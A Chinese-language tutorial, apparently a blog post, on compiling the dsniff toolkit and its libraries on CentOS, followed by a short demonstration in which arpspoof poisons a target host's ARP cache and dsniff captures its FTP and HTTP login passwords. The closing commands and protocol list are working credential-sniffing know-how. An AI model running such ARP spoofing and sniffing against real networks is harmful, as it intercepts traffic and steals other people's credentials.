linux如何ARP嗅探 Linux下嗅探工具Dsniff安装记录

 

先来下载依赖包 和一些必须要用到的工具

我这里用的是 dsniff-2.3 的版本

wget http://www.monkey.org/~dugsong/dsniff/dsniff-2.3.tar.gz
wget http://www.8090sec.com/uploads/soft/dsniff-2.3.tar.gz 备用下载

一、安装gcc

# yum -y install gcc

二、安装 openssl 直接yum安装也可以的

# tar zxvf openssl-0.9.7i.tar.gz
# cd openssl-0.9.7i
# ./config
# make
# make install

三、安装flex 和 bison

# yum -y install flex
# yum -y install bison

四、安装 libpcap 直接yum安装也可以
 
#wget http://www.tcpdump.org/release/libpcap-0.7.2.tar.gz
# tar zxvf libpcap-0.7.2.tar.gz
# cd libpcap-0.7.2
# ./configure
# make
# make install
# wget http://www.8090sec.com/uploads/soft/libpcap-0.7.2.tar.gz 备用下载

五、安装 libnet
# wget http://ips-builder.googlecode.com/files/libnet-1.0.2a.tar.gz
# tar zxvf libnet-1.0.2a.tar.gz
# cd Libnet-1.0.2a
# ./configure
# make
# make install
# wget http://www.8090sec.com/uploads/soft/libnet-1.0.2a.tar.gz 备用下载

六、安装 libnids
# wget http://distro.ibiblio.org/openwall/projects/scanlogd/lib/libnids-1.18.tar.gz
# tar zxvf libnids-1.18.tar.gz
# cd libnids-1.18
# ./configure
# make
# make install
# wget http://www.8090sec.com/uploads/soft/libnids-1.18.tar.gz 备用下载

七、安装BerkeleyDB
# wget http://download.oracle.com/berkeley-db/db-4.7.25.tar.gz
# tar zxvf db-4.7.25.tar.gz
# cd db-4.7.25/build_unix
# ../dist/configure --enable-compat185
# make
# make install

八、安装dsniff

# tar zxvf dsniff-2.3.tar.gz
# cd dsniff-2.3
# vi arp.c 加入 #include "memory.h"
# ./configure --enable-compat185 --with-db=/usr/local/BerkeleyDB.4.7
# make
# make install

九、其它设置

# vi /etc/sysctl.conf

修改 net.ipv4.ip_forward = 1

# sysctl -p

十、使用dsniff

# cp /usr/local/BerkeleyDB.4.7/lib/libdb-4.7.so /usr/lib
# cd /usr/local/sbin;ls
# ./dsniff --help

环境：

网关--> 192.168.1.1

路人甲 --> 192.168.1.123 (CentOS6.0 + dsniff-2.3)

路人乙 --> 192.168.1.125(Cent0S6.0 + Apache + Mysql)

目的：

使用 路人甲 嗅探 路人乙 的FTP、http 登录密码

1. 使用 arpspoof 对目标机实施ARP欺骗攻击
# arpspoof -i eth0 -t 192.168.1.125 192.168.1.1

2. 使用 dsniff 取得指定端口的数据信息 
# dsniff -i eth0 -t 21/tcp=ftp,80/tcp=http

 
 

Dsniff支持的协议类型包括：  
FTP，Telnet，SMTP，HTTP，POP，NNTP，IMAP，SNMP，LDAP，Rlogin，RIP，OSP  
F，PPTP，MS-CHAP，NFS，VRRP，YP/NIS，SOCKS，X11，CVS，IRC，AIM，ICQ，Napster，ostgreSQL，Meeting Maker，Citrix ICA，Symantec，pcAnywhere，NA  
I Sniffer，Microsoft SMB，Oracle QL*Net，Sybase及Microsoft SQL认证信息

编译遇到的问题可能有:
http://distro.ibiblio.org/openwall/projects/scanlogd/lib/
3个环境配子的文件 libnet libpcap libnids 注意安装编译的顺序,不然会无法成功 如果遇到编译错误无法解决更换版本多试试看.不一定要以上几个版本才行

另外推荐大家适应另外一个Linux下的嗅探工具 ettercap NG 后期我会给大家更新

ettercap嗅探工具